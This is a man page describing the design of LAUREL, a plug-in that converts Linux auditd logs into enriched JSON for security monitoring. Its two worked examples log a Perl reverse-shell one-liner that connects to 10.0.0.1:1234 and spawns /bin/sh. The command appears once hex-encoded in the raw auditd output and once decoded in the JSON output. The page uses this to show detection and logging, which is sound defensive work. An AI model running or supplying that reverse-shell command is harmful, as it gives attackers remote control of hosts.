oracular (7) laurel-about.7.gz

Provided by: laurel_0.6.2-2build1_amd64 bug

NAME

       laurel-about - High-level description of laurel(8) design, rationale, features

DESCRIPTION

   Problem statement
       While  logs  produced  by the Linux Audit subsystem and auditd(8) contain information that
       can be very useful for host-based security monitoring, the log format is  not  well-suited
       for at-scale analysis in a SIEM.

   Format issues
       • All  non-trivial  events are split across multiple lines that have to be joined together
         using a message identifier, but current search-centric log analysis  systems  are  quite
         limited when it comes to join operations.

       • Files and program executions are logged via PATH and EXECVE elements.  The character set
         for strings is a limited subset of ASCII no  escaping  mechanism  exists:  If  a  string
         contains bytes that have special meaning in the format (even space or quote characters),
         the entire string is hex-encoded.

       • Argument lists are  preserved  in  EXECVE  records,  but  with  an  a0="...",  a1="...",
         a2="...", a3="..." naming scheme, they are not easily accessible.

       • Long command lines may be spread across multiple EXECVE event lines.

       • For  numeric values, there is no clear distinction whether they should be interpreted as
         decimal, octal, or hexadecimal values.

   Missing context
       Most audit events are based on either system calls or file  operations.   Whether  or  not
       some  suspicious  actions  should be considered harmful, largely depends on the context in
       which it takes place.  For example, one would not expect  most  web  applications  to  use
       netcat  to  connect  to hosts on the Internet, but an administrator who is logged and over
       SSH who uses netcat to debug network issues should raise fewer suspicions.  Unfortunately,
       the only context that can be added for Linux audit events “keys” using the -k parameter of
       auditctl(8).

   Example
       Spawning a simple Perl reverse-shell one-liner creates  the  following  7-line  audit  log
       entry that nicely demonstrates some of these shortcomings:

              type=SYSCALL msg=audit(1626611363.720:348501): arch=c000003e syscall=59 success=yes exit=0 a0=55c094deb5c0 a1=55c094dea770 a2=55c094dbf1b0 a3=fffffffffffff286 items=3 ppid=722076 pid=724395 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=3 comm="perl" exe="/usr/bin/perl" subj==unconfined key=(null)ARCH=x86_64 SYSCALL=execve AUID="user" UID="root" GID="root" EUID="root" SUID="root" FSUID="root" EGID="root" SGID="root" FSGID="root"
              type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B657428532C50465F494E45542C534F434B5F53545245414D2C67657470726F746F62796E616D6528227463702229293B696628636F6E6E65637428532C736F636B616464725F696E2824702C696E65745F61746F6E282469292929297B6F70656E28535444494E2C223E265322293B6F70656E285354444F55542C223E265322293B6F70656E285354444552522C223E265322293B6578656328222F62696E2F7368202D6922293B7D3B
              type=CWD msg=audit(1626611363.720:348501): cwd="/root"
              type=PATH msg=audit(1626611363.720:348501): item=0 name="/usr/bin/perl" inode=401923 dev=fd:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root"
              type=PATH msg=audit(1626611363.720:348501): item=1 name="/usr/bin/perl" inode=401923 dev=fd:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root"
              type=PATH msg=audit(1626611363.720:348501): item=2 name="/lib64/ld-linux-x86-64.so.2" inode=404797 dev=fd:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root"
              type=PROCTITLE msg=audit(1626611363.720:348501): proctitle=7065726C002D650075736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B657428532C50465F494E45542C534F434B5F53545245414D2C67657470726F746F62796E616D6528227463702229293B696628636F6E6E65637428532C736F636B616464725F696E2824702C696E65745F6174

   Solution
       In  addition  to (or instead of) writing log files, auditd(8) can pass log lines to one or
       multiple plug-ins for further processing, see auditd-plugins(5).  laurel(8) is intended to
       be  run  as such a plug-in.  It reads the audit logs from standard input, parses them, and
       writes a modified form of the audit log to a different log file.

   Output format
       Log records carrying the same event ID (the msg=audit(TIME:SEQUENCE): part) are  collected
       into  coherent  events and output as a JSONlines-based log format.  Most importantly, hex-
       encoded    strings    are     output     as     regular     JSON     strings.      RfC8259
       (https://datatracker.ietf.org/doc/html/rfc8259)  mandates  that  “text  exchanged  between
       systems that are not part of a closed ecosystem MUST be encoded  using  UTF-8”,  therefore
       any  bytes  or byte sequences that are not valid UTF-8 are percent-encoded as described in
       RfC3986 (https://datatracker.ietf.org/doc/html/rfc3986).  Numbers are parsed  as  decimal,
       octal,  or hexadecimal values and output in an unambiguous format.  List data (SYSCALL.{a0
       ... a3} and EXECVE.a*) are turned into JSON arrays.  PROCTITLE.proctitle is split at  NULL
       bytes and transformed into a list.

   Structure
       Every  audit log line produced by LAUREL is one single JSON object consisting of key/value
       pairs that contains at least an ID field.

       • SYSCALL, EXECVE, CWD, PROCTITLE fields point to single JSON objects.

       • PATH, SOCKADDR fields point to lists of JSON objects.

       Every other kernel-produced audit message not mentioned above results in field pointing to
       a  list  of JSON objects.  Details may change after the list of kernel audit message types
       has been reviewed.

   Encoding of invalid UTF-8 strings and binary data
       • Most byte values that represent printable ASCII characters are reproduced as-is (but are
         subject to JSON string escaping rules).

       • Bytes  that  map  to  non-printable  ASCII  characters (less than 32/0x20; 127/0x7f) are
         percent-encoded.

       • Byte values that map to % (37/0x25) and + (42/0x2b) are percent-encoded.

       • Byte values outside of the ASCII range (greater than 127/0x7f) are reproduced  as-is  if
         they are part of a valid UTF-8 sequence.  Otherwise, they are percent-encoded.

       Handling of special Unicode characters may change in the future.

   Translation / Enrichment
       If  auditd(8)  has  been  configured  with log_format=ENRICHED, it translates some numeric
       values in the original  audit  data  to  strings.   Per  convention,  it  adds  translated
       information using all-caps versions of the keys.  For example,

              arch=c000003e syscall=59 uid=0

       get translated to

              ARCH=x86_64 SYSCALL=execve UID="root"

       by  auditd(8).   All  information  that  is added to records by laurel(8) follows the same
       convention, i.e. keys are turned into all-caps.  While laurel can be configured to perform
       the   same  translations  as  auditd(8),  it  can  perform  other  enrichments,  including
       interpreted scripts, collecting specific environment variables, or  container  information
       for processes that are run within container environments.

   Adding Context: Process Relationships, Labels
       While processing audit records laurel(8) tracks processes and remembers comm, exe, and the
       event ID associated with the latest execve event of a process.  Processes that are tracked
       can  be  assigned  labels  through  various  mechanisms and those labels can optionally be
       propagated to child processes.

       Mechanisms by which labels can be assigned include: - using the key from  an  audit  event
       (the  -k  option  of  auditctl(8))  -  regular  expression  applied to the executable path
       (SYSCALL.exe field) - regular expression applied to the script path (SYSCALL.SCRIPT field,
       enriched)

       The  process  tracking  information  can  be used to enrich fields containing process ids,
       including SYSCALL.{pid, ppid} and OBJ_PID.opid  associated  with  ptrace  attach  or  kill
       syscalls.

   Volume reduction: Filtering out events
       To  reduce  the  high  volume  of events, it is possible to filter out events by key or by
       process label.  Events that are filtered are still used for process tracking.

   Example
       The log lines from the Perl reverse shell execution above are processed by laurel(8)  into
       the following JSON log line:

              {"ID":"1626611363.720:348501","SYSCALL":{"arch":"0xc000003e","syscall":59,"success":"yes","exit":0,"a0":"0x55c094deb5c0","a1":"0x55c094dea770","a2":"0x55c094dbf1b0","a3":"0xfffffffffffff286","items":3,"ppid":722076,"pid":724395,"auid":1000,"uid":0,"gid":0,"euid":0,"suid":0,"fsuid":0,"egid":0,"sgid":0,"fsgid":0,"tty":"pts3","ses":3,"comm":"perl","exe":"/usr/bin/perl","subj":"=unconfined","key":null,"ARCH":"x86_64","SYSCALL":"execve","AUID":"user","UID":"root","GID":"root","EUID":"root","SUID":"root","FSUID":"root","EGID":"root","SGID":"root","FSGID":"root","PPID":{"EVENT_ID":"1626611323.973:348120","exe":"/bin/bash","comm":"bash","ppid":3190631}},"EXECVE":{"argc":3,"ARGV":["perl","-e","use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]},"CWD":{"cwd":"/root"},"PATH":[{"item":0,"name":"/usr/bin/perl","inode":401923,"dev":"fd:01","mode":"0o100755","ouid":0,"ogid":0,"rdev":"00:00","nametype":"NORMAL","cap_fp":"0x0","cap_fi":"0x0","cap_fe":0,"cap_fver":"0x0","cap_frootid":"0","OUID":"root","OGID":"root"},{"item":1,"name":"/usr/bin/perl","inode":401923,"dev":"fd:01","mode":"0o100755","ouid":0,"ogid":0,"rdev":"00:00","nametype":"NORMAL","cap_fp":"0x0","cap_fi":"0x0","cap_fe":0,"cap_fver":"0x0","cap_frootid":"0","OUID":"root","OGID":"root"},{"item":2,"name":"/lib64/ld-linux-x86-64.so.2","inode":404797,"dev":"fd:01","mode":"0o100755","ouid":0,"ogid":0,"rdev":"00:00","nametype":"NORMAL","cap_fp":"0x0","cap_fi":"0x0","cap_fe":0,"cap_fver":"0x0","cap_frootid":"0","OUID":"root","OGID":"root"}],"PROCTITLE":{"ARGV":["perl","-e","use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_at"]}}

   Audit rule set advice
       For  process tracking to work properly, the kernel should be configured to log all execve-
       like calls and all fork-like for processes that are expected to ose fork  without  execve,
       e.g. shells:

              -a exit,always -F arch=b32 -S execve,execveat -F success=1
              -a exit,always -F arch=b64 -S execve,execveat -F success=1

              -a exit,always -F arch=b32 -S fork,vfork,clone,clone3 -F success=1 -F exe=/bin/sh
              -a exit,always -F arch=b64 -S fork,vfork,clone,clone3 -F success=1 -F exe=/bin/sh
              -a exit,always -F arch=b32 -S fork,vfork,clone,clone3 -F success=1 -F exe=/bin/bash
              -a exit,always -F arch=b64 -S fork,vfork,clone,clone3 -F success=1 -F exe=/bin/bash
              # ...

       If  the fork calls are not needed in the log file, they can be filtered out by assigning a
       key to those rules in the audit ruleset and adding this key to filter.filter-keys.

       Note that older versions of auditd may not understand all the syscalls.  In  those  cases,
       it may be necessary to substitute the syscall numbers for the ruleset.

SEE ALSO

       laurel(8), auditd(8), audit.rules(7)

AUTHORS

       • Hilko Bengen <<bengen@hilluzination.de>>

       • Sergej Schmidt <<sergej@msgpeek.net>>